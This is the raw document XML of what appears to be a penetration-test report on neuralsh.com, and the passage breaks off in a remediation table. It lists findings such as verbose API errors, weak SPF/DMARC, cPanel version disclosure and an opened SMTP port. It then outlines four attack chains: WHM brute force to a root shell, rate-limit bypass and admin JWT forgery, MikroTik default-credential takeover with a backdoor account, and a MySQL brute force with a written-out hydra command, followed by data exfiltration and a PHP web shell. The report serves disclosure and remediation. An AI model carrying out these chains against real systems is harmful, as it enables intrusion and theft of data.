        <w:pStyle w:val="Heading3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>N-011: Internal Details Disclosed in API Error Responses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3.7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>neuralsh.com/api/*</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API errors return the full request URL, expected parameter names, and framework identifiers. Example: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>{"error":true,"url":"https://neuralsh.com/api/geocode","message":"Latitude and longitude are required"}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>. This reduces the reconnaissance effort needed to map and attack the API.</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Return generic error messages to clients and log detailed diagnostics server-side only.</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request to /api/geocode returning verbose internal error response</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>N-012: SPF Softfail and DMARC Quarantine Policy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neuralsh.com DNS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>dig</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SPF is set to softfail (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>~all</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">) and DMARC to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>p=quarantine</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, meaning spoofed emails from </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>@neuralsh.com</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> are flagged but not rejected. Some mail servers may still deliver phishing emails using the neuralsh.com domain identity.</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 xml:space="preserve">Change SPF to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>-all</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (hardfail) and update DMARC to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>p=reject; rua=mailto:dmarc@neuralsh.com</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>.</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dig output confirming SPF ~all and DMARC p=quarantine</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>N-017: cPanel Version Disclosed via Static Asset Paths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3.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>103.16.xx.xxx:2083</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>curl</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 xml:space="preserve">Static asset paths include a timestamp-based revision number (e.g. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>cPanel_magic_revision_1698766296</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>) that can be cross-referenced to identify the exact cPanel version, enabling targeted CVE research.</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Update cPanel to the latest supported release and suppress magic revision numbers in static asset paths.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Evidence:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> curl response from port 2083 showing cPanel_magic_revision in asset URL</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>N-019: SMTP Port 25 Transitioned from Filtered to Open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Severity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
            <w:shd w:val="clear" w:color="auto" w:fill="2E74B5"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>CVSS Score</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
            <w:shd w:val="clear" w:color="auto" w:fill="2E74B5"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Affected Host</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
            <w:shd w:val="clear" w:color="auto" w:fill="2E74B5"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Tool(s) Used</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
            <w:shd w:val="clear" w:color="auto" w:fill="70AD47"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>3.5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>103.16.xx.xxx:25</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Nmap, nc</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Description</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Port 25 was filtered in the June 6 baseline and open in the June 10 follow-up, indicating a firewall rule was removed without documented change control. An open SMTP port exposes the server to mail relay testing and SMTP user enumeration.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Remediation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Investigate the firewall rule change and restore the port 25 block if direct SMTP delivery is not required.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>5.4 Attack Chain Analysis</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>The 20 individual findings do not exist in isolation. The following attack chains map how findings combine into multi-step compromise paths, each representing a realistic scenario executable by an external unauthenticated attacker. Figure 4.22 provides a visual overview of all four chains.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5040000" cy="2503926"/>
            <wp:docPr id="38" name="Picture 38"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="fig422_attack_chains.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId46"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5040000" cy="2503926"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="240"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Figure 4.22: Attack chain diagram — four confirmed attack vectors</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>5.4.1 Attack Chain 1 — Server Takeover via Admin Panel</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server root access — all hosted domains compromised</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DNS MX lookup on mail.neuralsh.com reveals the origin IP address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Nmap scan confirms port 2087 open — WHM root admin panel</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Navigate to WHM login page — no IP restriction, no 2FA, no lockout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Brute force credentials or trigger password reset via email compromise</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Login to WHM Terminal — root shell access obtained</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Read all .env files, database credentials, and API keys across all hosted accounts</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Connect to MySQL directly with extracted credentials — full data theft</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Maximum (CVSS 10.0)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>5.4.2 Attack Chain 2 — API Abuse via Rate Limit Bypass</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Unlimited API access, data enumeration, potential account takeover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Load neuralsh.com — JavaScript bundle reveals /web/v1/init/token</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Send requests with rotating X-Forwarded-For values — rate limiter is bypassed</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Collect fifty valid JWT tokens in under three seconds (100% bypass, confirmed)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Automate token refresh every twenty-nine minutes — perpetual API access established</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Enumerate /web/v1/text/search, /web/v1/image/search, /web/v1/category</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JWT secret obtained via Chain 1 — forge token with type:admin claim</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 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Likelihood:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> High (fully demonstrated) | </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Severity:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> High</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>5.4.3 Attack Chain 3 — Network Infrastructure Takeover via MikroTik</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network routing control — traffic interception possible</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9001 open — MikroTik RouterOS WebFig interface</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Navigate to the login page — pre-filled admin username, no IP restriction</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Attempt factory default credentials: admin / (blank password)</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If default credentials active — full RouterOS dashboard access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Enable Packet Sniffer — capture all network traffic in plaintext</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Modify routing tables — redirect traffic to attacker-controlled endpoint</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Create backdoor admin account for persistent access</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Low (if default credentials active) | </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Likelihood:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Medium-High | </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Severity:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Critical</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>5.4.4 Attack Chain 4 — MySQL Brute Force to Data Exfiltration</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Starting point:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Any internet connection</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>End result:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Full database access, potential remote code execution</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Nmap scan confirms port 3306 open — MySQL 8.0.43 accepting remote connections</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Gather username candidates from JS bundle, error messages, and cPanel redirects</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Run credential brute force: hydra -L users.txt -P passwords.txt mysql://[TARGET]</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Successful login — execute SHOW DATABASES and SELECT * FROM users</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Exfiltrate user records, search history, and API credentials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If FILE privilege granted — write PHP web shell to document root for remote code execution</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Complexity:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Medium | </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Likelihood:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Medium | </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Severity:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Critical</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>5.5 Remediation Roadmap</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>5.5.1 Priority Matrix</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2E74B5"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Priority</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
            <w:shd w:val="clear" w:color="auto" w:fill="2E74B5"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Finding</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
            <w:shd w:val="clear" w:color="auto" w:fill="2E74B5"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Required Action</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
            <w:shd w:val="clear" w:color="auto" w:fill="2E74B5"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Time Estimate</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N-014 WHM</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Firewall port 2087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N-013 cPanel</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Firewall port 2083 to trusted IPs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N-001 MySQL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Firewall port 3306 to localhost only</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P0 — Immediate</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>N-002 MikroTik</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Firewall port 9001, change default credentials</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N-005 Rate Limit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Replace X-Forwarded-For with CF-Connecting-IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
